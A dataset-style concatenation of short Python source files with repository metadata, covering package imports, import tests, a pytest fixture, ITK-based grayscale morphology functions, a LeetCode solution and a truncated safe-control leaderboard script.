3e8eba9459eb57ec30676e9b58ba05a91a536734 | 166 | py | Python | galaxy/cartography/__init__.py | damienlancry/galaxy | b9445b1caae64aa77686ba145cd759fcf7158f08 | [
"MIT"
] | null | null | null | galaxy/cartography/__init__.py | damienlancry/galaxy | b9445b1caae64aa77686ba145cd759fcf7158f08 | [
"MIT"
] | null | null | null | galaxy/cartography/__init__.py | damienlancry/galaxy | b9445b1caae64aa77686ba145cd759fcf7158f08 | [
"MIT"
] | null | null | null | from .spotify_cartographer import SpotifyCartographer
from .youtube_cartographer import YoutubeCartographer
__all__ = ["YoutubeCartographer", "SpotifyCartographer"]
| 33.2 | 56 | 0.861446 | 13 | 166 | 10.538462 | 0.615385 | 0.262774 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.078313 | 166 | 4 | 57 | 41.5 | 0.895425 | 0 | 0 | 0 | 0 | 0 | 0.228916 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e4a77720a1c59e064f21cd64aa79ae0bec14002b | 378 | py | Python | gdalutils/__init__.py | jsosa/gdalutils | 00275cb7415565042511c33f387cad1a90d5e3de | [
"BSD-3-Clause"
] | 1 | 2021-02-04T15:55:29.000Z | 2021-02-04T15:55:29.000Z | gdalutils/__init__.py | jsosa/gdalutils | 00275cb7415565042511c33f387cad1a90d5e3de | [
"BSD-3-Clause"
] | null | null | null | gdalutils/__init__.py | jsosa/gdalutils | 00275cb7415565042511c33f387cad1a90d5e3de | [
"BSD-3-Clause"
] | 1 | 2021-04-08T13:22:35.000Z | 2021-04-08T13:22:35.000Z | from .core import get_dataxy
from .core import get_data
from .core import get_geo
from .core import clip_raster
from .core import write_raster
from .core import pandas_to_array
from .core import pandas_to_raster
from .core import points_to_geopandas
from .core import array_to_pandas
from .core import raster_to_pandas
from .core import assign_val
from .extras import haversine
| 29.076923 | 37 | 0.84127 | 64 | 378 | 4.71875 | 0.296875 | 0.291391 | 0.509934 | 0.168874 | 0.291391 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.126984 | 378 | 12 | 38 | 31.5 | 0.915152 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
9048410a73cf63af045fbdbde34b9400153b2beb | 69 | py | Python | aplpy/setup_package.py | nbrunett/aplpy | f5d128faf3568adea753d52c11ba43014d25d90a | [
"MIT"
] | null | null | null | aplpy/setup_package.py | nbrunett/aplpy | f5d128faf3568adea753d52c11ba43014d25d90a | [
"MIT"
] | null | null | null | aplpy/setup_package.py | nbrunett/aplpy | f5d128faf3568adea753d52c11ba43014d25d90a | [
"MIT"
] | 1 | 2018-02-26T03:04:19.000Z | 2018-02-26T03:04:19.000Z | def get_package_data():
return {'aplpy.tests': ['data/*/*.hdr']}
| 23 | 44 | 0.608696 | 9 | 69 | 4.444444 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130435 | 69 | 2 | 45 | 34.5 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
5f3aa521fd282dfe059b73d5c7bf13c751510490 | 43 | py | Python | asteroid/filterbanks/stft_fb.py | julien-c/asteroid | 77d1b744017408b8bf4f1812e949c3c3aa4b16d3 | [
"MIT"
] | 1 | 2021-02-22T21:55:40.000Z | 2021-02-22T21:55:40.000Z | asteroid/filterbanks/stft_fb.py | julien-c/asteroid | 77d1b744017408b8bf4f1812e949c3c3aa4b16d3 | [
"MIT"
] | null | null | null | asteroid/filterbanks/stft_fb.py | julien-c/asteroid | 77d1b744017408b8bf4f1812e949c3c3aa4b16d3 | [
"MIT"
] | 1 | 2021-04-29T01:52:37.000Z | 2021-04-29T01:52:37.000Z | from asteroid_filterbanks.stft_fb import *
| 21.5 | 42 | 0.860465 | 6 | 43 | 5.833333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.093023 | 43 | 1 | 43 | 43 | 0.897436 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
5fa076115c3482d09134b92ae221f6197657246e | 515 | py | Python | IPython/utils/tests/test_imports.py | pyarnold/ipython | c4797f7f069d0a974ddfa1e4251c7550c809dba0 | [
"BSD-3-Clause-Clear"
] | 1 | 2020-12-18T01:07:55.000Z | 2020-12-18T01:07:55.000Z | IPython/utils/tests/test_imports.py | pyarnold/ipython | c4797f7f069d0a974ddfa1e4251c7550c809dba0 | [
"BSD-3-Clause-Clear"
] | null | null | null | IPython/utils/tests/test_imports.py | pyarnold/ipython | c4797f7f069d0a974ddfa1e4251c7550c809dba0 | [
"BSD-3-Clause-Clear"
] | null | null | null | # encoding: utf-8
def test_import_coloransi():
from IPython.utils import coloransi
def test_import_generics():
from IPython.utils import generics
def test_import_ipstruct():
from IPython.utils import ipstruct
def test_import_PyColorize():
from IPython.utils import PyColorize
def test_import_rlineimpl():
from IPython.utils import rlineimpl
def test_import_strdispatch():
from IPython.utils import strdispatch
def test_import_wildcard():
from IPython.utils import wildcard
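Each test above is just an import smoke test. The same check can be written generically with importlib; the module names below are stdlib stand-ins for illustration, not IPython's:

```python
import importlib

def check_imports(module_names):
    """Try to import each named module; return the names that failed."""
    failed = []
    for name in module_names:
        try:
            importlib.import_module(name)
        except ImportError:
            failed.append(name)
    return failed

# stdlib modules import cleanly; a bogus name is reported back
assert check_imports(["json", "math"]) == []
assert check_imports(["no_such_module_xyz"]) == ["no_such_module_xyz"]
```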
| 17.166667 | 41 | 0.770874 | 66 | 515 | 5.80303 | 0.242424 | 0.127937 | 0.237598 | 0.402089 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002336 | 0.168932 | 515 | 29 | 42 | 17.758621 | 0.892523 | 0.029126 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 1 | 0 | 1.5 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
396b885b1aee6255e728e14ce7bbe19bab7c4071 | 104 | py | Python | tests/fixtures/alert.py | Sheshtawy/hawkeye | 3f8a6002ec56edc6d60d0fb87aa6b7ee56ccfb14 | [
"MIT"
] | 1 | 2017-08-08T14:30:36.000Z | 2017-08-08T14:30:36.000Z | tests/fixtures/alert.py | Sheshtawy/hawkeye | 3f8a6002ec56edc6d60d0fb87aa6b7ee56ccfb14 | [
"MIT"
] | 45 | 2017-08-22T13:01:51.000Z | 2017-12-12T12:19:14.000Z | tests/fixtures/alert.py | Sheshtawy/hawkeye | 3f8a6002ec56edc6d60d0fb87aa6b7ee56ccfb14 | [
"MIT"
] | null | null | null | import pytest
from hawkeye.alert import Alert
@pytest.fixture
def alert():
return Alert('cpu', 20)
| 14.857143 | 31 | 0.730769 | 15 | 104 | 5.066667 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022989 | 0.163462 | 104 | 6 | 32 | 17.333333 | 0.850575 | 0 | 0 | 0 | 0 | 0 | 0.028846 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0.4 | 0.2 | 0.8 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
39b7468f13d7ac70b5911f60e6bc0c446aab692d | 8,157 | py | Python | plugins/morphology/grayscale.py | bsavelev/medipy | f0da3750a6979750d5f4c96aedc89ad5ae74545f | [
"CECILL-B"
] | null | null | null | plugins/morphology/grayscale.py | bsavelev/medipy | f0da3750a6979750d5f4c96aedc89ad5ae74545f | [
"CECILL-B"
] | null | null | null | plugins/morphology/grayscale.py | bsavelev/medipy | f0da3750a6979750d5f4c96aedc89ad5ae74545f | [
"CECILL-B"
] | 1 | 2022-03-04T05:47:08.000Z | 2022-03-04T05:47:08.000Z | ##########################################################################
# MediPy - Copyright (C) Universite de Strasbourg, 2011
# Distributed under the terms of the CeCILL-B license, as published by
# the CEA-CNRS-INRIA. Refer to the LICENSE file or to
# http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html
# for details.
##########################################################################
import itk
import medipy.itk
from structuring_element import name_to_structuring_element
def erode(input, *args, **kwargs):
""" Gray-scale erosion of an image using a name of a structuring element and a
radius, or a structuring element.
<gui>
<item name="input" type="Image" label="Input"/>
<item name="shape" type="Enum" initializer="('ball', 'box','cross')"
label="Shape"/>
<item name="radius" type="Int" initializer="1" label="Radius"/>
<item name="output" type="Image" initializer="output=True" role="return"
label="Output"/>
</gui>
"""
if len(args) == 1 :
return erode_se(input, *args)
elif len(args) == 2 :
return erode_shape_and_radius(input, *args)
elif len(args) == 0 :
if "shape" in kwargs :
return erode_shape_and_radius(input, **kwargs)
elif "structuring_element" in kwargs :
return erode_se(input, **kwargs)
else :
raise Exception("Incorrect parameters")
else :
raise Exception("Incorrect parameters")
def erode_shape_and_radius(input, shape, radius):
""" Gray-scale erosion of an image using a name of a structuring element and a
radius
"""
structuring_element = name_to_structuring_element(shape, input.ndim, radius)
return erode_se(input, structuring_element)
def erode_se(input, structuring_element):
""" Gray-scale erosion of an image using a structuring element.
"""
itk_input = medipy.itk.medipy_image_to_itk_image(input, False)
filter = itk.GrayscaleErodeImageFilter[itk_input, itk_input, structuring_element].New(
Input=itk_input, Kernel=structuring_element)
itk_output = filter()[0]
output = medipy.itk.itk_image_to_medipy_image(itk_output, None, True)
return output
def dilate(input, *args, **kwargs):
""" Gray-scale dilation of an image using a name of a structuring element and a
radius, or a structuring element.
<gui>
<item name="input" type="Image" label="Input"/>
<item name="shape" type="Enum" initializer="('ball', 'box','cross')"
label="Shape"/>
<item name="radius" type="Int" initializer="1" label="Radius"/>
<item name="output" type="Image" initializer="output=True" role="return"
label="Output"/>
</gui>
"""
if len(args) == 1 :
return dilate_se(input, *args)
elif len(args) == 2 :
return dilate_shape_and_radius(input, *args)
elif len(args) == 0 :
if "shape" in kwargs :
return dilate_shape_and_radius(input, **kwargs)
elif "structuring_element" in kwargs :
return dilate_se(input, **kwargs)
else :
raise Exception("Incorrect parameters")
else :
raise Exception("Incorrect parameters")
def dilate_shape_and_radius(input, shape, radius):
""" Gray-scale dilation of an image using a name of a structuring element and a
radius
"""
structuring_element = name_to_structuring_element(shape, input.ndim, radius)
return dilate_se(input, structuring_element)
def dilate_se(input, structuring_element):
""" Gray-scale dilation of an image using a structuring element.
"""
itk_input = medipy.itk.medipy_image_to_itk_image(input, False)
filter = itk.GrayscaleDilateImageFilter[itk_input, itk_input, structuring_element].New(
Input=itk_input, Kernel=structuring_element)
itk_output = filter()[0]
output = medipy.itk.itk_image_to_medipy_image(itk_output, None, True)
return output
def open(input, *args, **kwargs):
""" Gray-scale opening of an image using a name of a structuring element and a
radius, or a structuring element.
<gui>
<item name="input" type="Image" label="Input"/>
<item name="shape" type="Enum" initializer="('ball', 'box','cross')"
label="Shape"/>
<item name="radius" type="Int" initializer="1" label="Radius"/>
<item name="output" type="Image" initializer="output=True" role="return"
label="Output"/>
</gui>
"""
if len(args) == 1 :
return open_se(input, *args)
elif len(args) == 2 :
return open_shape_and_radius(input, *args)
elif len(args) == 0 :
if "shape" in kwargs :
return open_shape_and_radius(input, **kwargs)
elif "structuring_element" in kwargs :
return open_se(input, **kwargs)
else :
raise Exception("Incorrect parameters")
else :
raise Exception("Incorrect parameters")
def open_shape_and_radius(input, shape, radius):
""" Gray-scale opening of an image using a name of a structuring element and a
radius
"""
structuring_element = name_to_structuring_element(shape, input.ndim, radius)
return open_se(input, structuring_element)
def open_se(input, structuring_element):
""" Gray-scale opening of an image using a structuring element.
"""
itk_input = medipy.itk.medipy_image_to_itk_image(input, False)
erode_filter = itk.GrayscaleErodeImageFilter[itk_input, itk_input, structuring_element].New(
Input=itk_input, Kernel=structuring_element)
dilate_filter = itk.GrayscaleDilateImageFilter[itk_input, itk_input, structuring_element].New(
Input=erode_filter[0], Kernel=structuring_element)
itk_output = dilate_filter()[0]
output = medipy.itk.itk_image_to_medipy_image(itk_output, None, True)
return output
def close(input, *args, **kwargs):
""" Gray-scale closing of an image using a name of a structuring element and a
radius, or a structuring element.
<gui>
<item name="input" type="Image" label="Input"/>
<item name="shape" type="Enum" initializer="('ball', 'box','cross')"
label="Shape"/>
<item name="radius" type="Int" initializer="1" label="Radius"/>
<item name="output" type="Image" initializer="output=True" role="return"
label="Output"/>
</gui>
"""
if len(args) == 1 :
return close_se(input, *args)
elif len(args) == 2 :
return close_shape_and_radius(input, *args)
elif len(args) == 0 :
if "shape" in kwargs :
return close_shape_and_radius(input, **kwargs)
elif "structuring_element" in kwargs :
return close_se(input, **kwargs)
else :
raise Exception("Incorrect parameters")
else :
raise Exception("Incorrect parameters")
def close_shape_and_radius(input, shape, radius):
""" Gray-scale closing of an image using a name of a structuring element and a
radius
"""
structuring_element = name_to_structuring_element(shape, input.ndim, radius)
return close_se(input, structuring_element)
def close_se(input, structuring_element):
""" Gray-scale closing of an image using a structuring element.
"""
itk_input = medipy.itk.medipy_image_to_itk_image(input, False)
dilate_filter = itk.GrayscaleDilateImageFilter[itk_input, itk_input, structuring_element].New(
Input=itk_input, Kernel=structuring_element)
erode_filter = itk.GrayscaleErodeImageFilter[itk_input, itk_input, structuring_element].New(
Input=dilate_filter[0], Kernel=structuring_element)
itk_output = erode_filter()[0]
output = medipy.itk.itk_image_to_medipy_image(itk_output, None, True)
return output
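The grayscale operations above delegate to ITK filters. For intuition, here is a minimal NumPy-only sketch of grayscale erosion with a box structuring element — a hypothetical stand-alone helper, not part of MediPy, using edge replication at the borders:

```python
import numpy as np

def grayscale_erode_box(image, radius):
    """Grayscale erosion: each output pixel is the minimum over the
    (2*radius+1)-wide box neighborhood, with edge replication at borders."""
    padded = np.pad(image, radius, mode="edge")
    size = 2 * radius + 1
    out = np.empty_like(image)
    for idx in np.ndindex(image.shape):
        # window of the padded image centered on the original pixel
        window = padded[tuple(slice(i, i + size) for i in idx)]
        out[idx] = window.min()
    return out

a = np.array([[1, 2, 3],
              [4, 5, 6],
              [7, 8, 9]])
eroded = grayscale_erode_box(a, 1)
```

Dilation is the same loop with max(); opening and closing compose the two in opposite orders, mirroring the erode/dilate pairs inside open_se and close_se above.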
| 38.842857 | 98 | 0.625843 | 984 | 8,157 | 5.019309 | 0.098577 | 0.182223 | 0.061551 | 0.034015 | 0.927921 | 0.880948 | 0.852602 | 0.836404 | 0.775461 | 0.775461 | 0 | 0.004407 | 0.248866 | 8,157 | 209 | 99 | 39.028708 | 0.801697 | 0.323648 | 0 | 0.601942 | 0 | 0 | 0.052827 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.116505 | false | 0 | 0.029126 | 0 | 0.378641 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
39d84094f92a331a7281c05c5714fcca5f49c6ff | 159 | py | Python | codes_/0709_To_Lower_Case.py | SaitoTsutomu/leetcode | 4656d66ab721a5c7bc59890db9a2331c6823b2bf | [
"MIT"
] | null | null | null | codes_/0709_To_Lower_Case.py | SaitoTsutomu/leetcode | 4656d66ab721a5c7bc59890db9a2331c6823b2bf | [
"MIT"
] | null | null | null | codes_/0709_To_Lower_Case.py | SaitoTsutomu/leetcode | 4656d66ab721a5c7bc59890db9a2331c6823b2bf | [
"MIT"
] | null | null | null | # %% [709. To Lower Case](https://leetcode.com/problems/to-lower-case/)
class Solution:
def toLowerCase(self, str: str) -> str:
return str.lower()
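A quick sanity check of the one-liner against simple mixed-case inputs:

```python
class Solution:
    def toLowerCase(self, str: str) -> str:
        return str.lower()

sol = Solution()
assert sol.toLowerCase("Hello") == "hello"
assert sol.toLowerCase("here") == "here"
assert sol.toLowerCase("LOVELY") == "lovely"
```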
| 31.8 | 71 | 0.647799 | 22 | 159 | 4.681818 | 0.681818 | 0.135922 | 0.213592 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022901 | 0.176101 | 159 | 4 | 72 | 39.75 | 0.763359 | 0.433962 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
39e4dfcc1a8074fe3683360181257d9481806b01 | 92 | py | Python | modules/services/__init__.py | vladimir2240/orders_searcher | dac5143ec882f84ba263b5dd5a5eca1891051f3e | [
"MIT"
] | null | null | null | modules/services/__init__.py | vladimir2240/orders_searcher | dac5143ec882f84ba263b5dd5a5eca1891051f3e | [
"MIT"
] | null | null | null | modules/services/__init__.py | vladimir2240/orders_searcher | dac5143ec882f84ba263b5dd5a5eca1891051f3e | [
"MIT"
] | null | null | null | from .binance_handler import BinanceHandler
from .binance_websocket import BinanceWsWorkers
| 30.666667 | 47 | 0.891304 | 10 | 92 | 8 | 0.7 | 0.275 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086957 | 92 | 2 | 48 | 46 | 0.952381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
841d430b2634225f60f9d52d948e35f4f9024496 | 101 | py | Python | Nurture/server/notification/nurture/learning/agents/classification/__init__.py | nesl/EngagementService | bb8dc5a58d2038ace6467bfbcf4d253680628f67 | [
"BSD-3-Clause"
] | null | null | null | Nurture/server/notification/nurture/learning/agents/classification/__init__.py | nesl/EngagementService | bb8dc5a58d2038ace6467bfbcf4d253680628f67 | [
"BSD-3-Clause"
] | null | null | null | Nurture/server/notification/nurture/learning/agents/classification/__init__.py | nesl/EngagementService | bb8dc5a58d2038ace6467bfbcf4d253680628f67 | [
"BSD-3-Clause"
] | null | null | null | from .svm_clf import SVMClassifier
from .rf_clf import RFClassifier
from .nn_clf import NNClassifier
| 25.25 | 34 | 0.851485 | 15 | 101 | 5.533333 | 0.6 | 0.325301 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.118812 | 101 | 3 | 35 | 33.666667 | 0.932584 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
84264af413796f3498efbfa6d6aa0d66e36c19c8 | 243 | py | Python | src/safegraph_eval/__init__.py | echong-SG/safegraph_eval | 8a0f3a2b3098885cbb1e6579f9de01a83779e223 | [
"Apache-2.0"
] | null | null | null | src/safegraph_eval/__init__.py | echong-SG/safegraph_eval | 8a0f3a2b3098885cbb1e6579f9de01a83779e223 | [
"Apache-2.0"
] | null | null | null | src/safegraph_eval/__init__.py | echong-SG/safegraph_eval | 8a0f3a2b3098885cbb1e6579f9de01a83779e223 | [
"Apache-2.0"
] | 1 | 2021-12-30T19:43:57.000Z | 2021-12-30T19:43:57.000Z | all = ['ingest', 'preprocessing', 'plotting', 'geometry']
from safegraph_eval.ingest import ingest
from safegraph_eval.preprocessing import preprocessing
from safegraph_eval.plotting import plotting
from safegraph_eval.geometry import geometry | 48.6 | 57 | 0.839506 | 29 | 243 | 6.896552 | 0.310345 | 0.26 | 0.34 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08642 | 243 | 5 | 58 | 48.6 | 0.900901 | 0 | 0 | 0 | 0 | 0 | 0.143443 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.8 | 0 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
842f375fdb4cb82f8998353379107e5dc35d89b0 | 6,356 | py | Python | src/leaderboard.py | intelligent-control-lab/BIS | 7df10426373696093271e9afcae0c7e8fa7be0f4 | [
"MIT"
] | 10 | 2019-07-06T06:11:45.000Z | 2021-06-23T06:07:38.000Z | src/leaderboard.py | intelligent-control-lab/BIS | 7df10426373696093271e9afcae0c7e8fa7be0f4 | [
"MIT"
] | null | null | null | src/leaderboard.py | intelligent-control-lab/BIS | 7df10426373696093271e9afcae0c7e8fa7be0f4 | [
"MIT"
] | 6 | 2019-09-09T00:47:40.000Z | 2021-09-11T12:32:06.000Z | from roc_curve import roc_curve
import numpy as np
import matplotlib
# matplotlib.use("TkAgg")
import matplotlib.pyplot as plt
def leaderboard():
"""
This function calls the evaluate() function to test algorithms over the given parameter ranges. Parameter ranges are model-specific. The parameters are grid-searched for each algorithm, and the ROC curve is generated as a convex hull covering all results on the safety-efficiency plot.
"""
# models = ['Ball3D']
# settings = [ \
# # ('SlidingMode', {'d_min': [1, 1.5, 2, 2.5, 3], 'k_v': [1, 1.5, 2], 'u_p': [1, 5, 10]}),\
# ('SafeSet', {'d_min': [1, 1.5, 2, 2.5, 3], 'yita': [1, 2, 4, 8], 'k_v': [1, 1.5, 2]}),\
# # ('SublevelSafeSet', {'d_min': [1, 2], 'k_v': [0.5, 1, 1.5, 2], 'gamma':[1, 2, 5, 10]}),\
# # ('ZeroingBarrierFunction', {'d_min': [1, 2, 3, 4], 't':[0.5, 1, 2, 5], 'gamma':[0.1, 1, 5]}),\
# ('PotentialField', {'d_min': [1, 2, 3], 'k_v': [0.5, 1, 2], 'c1': [1, 3, 5]}),\
# ]
# roc_curve(models, settings, True)
# models = ['Unicycle']
# settings = [ \
# # ('SlidingMode', {'d_min': [1, 1.5, 2, 2.5, 3], 'k_v': [1, 1.5, 2], 'u_p': [1, 5, 10]}),\
# ('SafeSet', {'d_min': [1, 1.5, 2, 2.5, 3], 'yita': [1, 2, 4, 8], 'k_v': [1, 1.5, 2]}),\
# # ('SublevelSafeSet', {'d_min': [1, 2], 'k_v': [0.5, 1, 1.5, 2], 'gamma':[1, 2, 5, 10]}),\
# # ('ZeroingBarrierFunction', {'d_min': [1, 2, 3, 4], 't':[0.5, 1, 2, 5], 'gamma':[0.1, 1, 5]}),\
# ('PotentialField', {'d_min': [1, 2, 3], 'k_v': [0.5, 1, 2], 'c1': [1, 3, 5]}),\
# ]
# roc_curve(models, settings, True)
models = ['SCARA']
    settings = [
        ('SlidingMode', {'d_min': [1, 1.5, 2, 2.5, 3], 'k_v': [1, 1.5, 2], 'u_p': [1, 5, 10]}),
        ('SafeSet', {'d_min': [1, 1.5, 2, 2.5, 3], 'yita': [1, 2, 4, 8], 'k_v': [1, 1.5, 2]}),
        ('SublevelSafeSet', {'d_min': [1, 2, 3], 'k_v': [0.5, 1, 1.5, 2], 'gamma': [1, 2, 5, 10]}),
        ('ZeroingBarrierFunction', {'d_min': [2, 3, 4], 't': [0.5, 1, 2, 5], 'gamma': [0.1, 1, 2, 5, 10]}),
        ('PotentialField', {'d_min': [1, 2, 3], 'k_v': [0.5, 1, 2], 'c1': [1, 3, 5]}),
    ]
roc_curve(models, settings, True)
# models = ['RobotArm']
# settings = [ \
# # ('SlidingMode', {'d_min': [1, 1.5, 2, 2.5, 3], 'k_v': [1, 1.5, 2], 'u_p': [1, 5, 10]}),\
# ('SafeSet', {'d_min': [1, 1.5, 2, 2.5, 3], 'yita': [1, 2, 4, 8], 'k_v': [1, 1.5, 2]}),\
# # ('SafeSublevelSet', {'d_min': [1, 2], 'k_v': [0.5, 1, 1.5, 2], 'gamma':[1, 2, 5, 10]}),\
# # ('ZeroingBarrierFunction', {'d_min': [1, 2, 3, 4], 't':[0.5, 1, 2, 5], 'gamma':[0.1, 1, 5]}),\
# # ('SublevelSafeSet', {'d_min': [1, 2, 3], 'k_v': [0.25, 0.5, 1, 1.5, 2], 'gamma':[1, 2, 5, 10, 20, 50, 100, 200]}),\
# ('PotentialField', {'d_min': [1, 2, 3], 'k_v': [0.5, 1, 2], 'c1': [1, 3, 5]}),\
# ]
# roc_curve(models, settings, True)
# fig, axs =plt.subplots(len(models)+1,1)
# for i,model in enumerate(models):
# print(i, model)
# algs = list(ret[model].keys())
# # safe = [x['safety'] for x in ret[model].values()]
# # effi = [x['efficiency'] for x in ret[model].values()]
# auc = list(ret[model].values())
# table = np.vstack([algs, auc]).T
# collabel=("Algorithm", "AUC")
# the_table = axs[i].table(cellText=table,colLabels=collabel,loc='center')
# plt.show()
# models = ['Ball3D']
# settings = [ \
# ('SlidingMode', {'d_min': [1, 1.5, 2, 2.5, 3], 'k_v': [1, 1.5, 2], 'u_p': [1, 5, 10]}),\
# ('PotentialField', {'d_min': [1, 1.5, 2, 2.5, 3], 'lambd': [3, 5, 10, 15, 20]}),\
# ('SafeSet', {'d_min': [1, 1.5, 2, 2.5, 3], 'yita': [1, 2, 4, 8], 'k_v': [1, 1.5, 2]}),\
# ('SublevelSafeSet', {'d_min': [1, 2], 'k_v': [0.5, 1, 1.5, 2], 'gamma':[1, 2, 5, 10]}),\
# # ('SafeSublevelSet', {'d_min': [1, 2, 3], 'k_v': [0.5, 1, 1.5, 2], 'gamma':[0.5, 1, 2]}),\
# ('ZeroingBarrierFunction', {'d_min': [1, 2, 3, 4], 't':[0.5, 1, 2, 5], 'gamma':[0.1, 1, 5]}),\
# ]
# roc_curve(models, settings, False)
# models = ['Unicycle']
# settings = [ \
# ('SlidingMode', {'d_min': [1, 1.5, 2, 2.5, 3], 'k_v': [1, 1.5, 2], 'u_p': [1, 5, 10]}),\
# ('PotentialField', {'d_min': [1, 1.5, 2, 2.5, 3], 'lambd': [3, 5, 10, 15, 20]}),\
# ('SafeSet', {'d_min': [1, 1.5, 2, 2.5, 3], 'yita': [1, 2, 4, 8], 'k_v': [1, 1.5, 2]}),\
# ('SublevelSafeSet', {'d_min': [1, 2], 'k_v': [0.5, 1, 1.5, 2], 'gamma':[1, 2, 5, 10]}),\
# ('ZeroingBarrierFunction', {'d_min': [1, 2, 3, 4], 't':[0.5, 1, 2, 5], 'gamma':[0.1, 1, 5]}),\
# ]
# roc_curve(models, settings, False)
# models = ['SCARA']
# settings = [ \
# ('SlidingMode', {'d_min': [1, 1.5, 2, 2.5, 3], 'k_v': [1, 1.5, 2], 'u_p': [1, 5, 10]}),\
# ('PotentialField', {'d_min': [1, 1.5, 2, 2.5, 3], 'lambd': [3, 5, 10, 15, 20]}),\
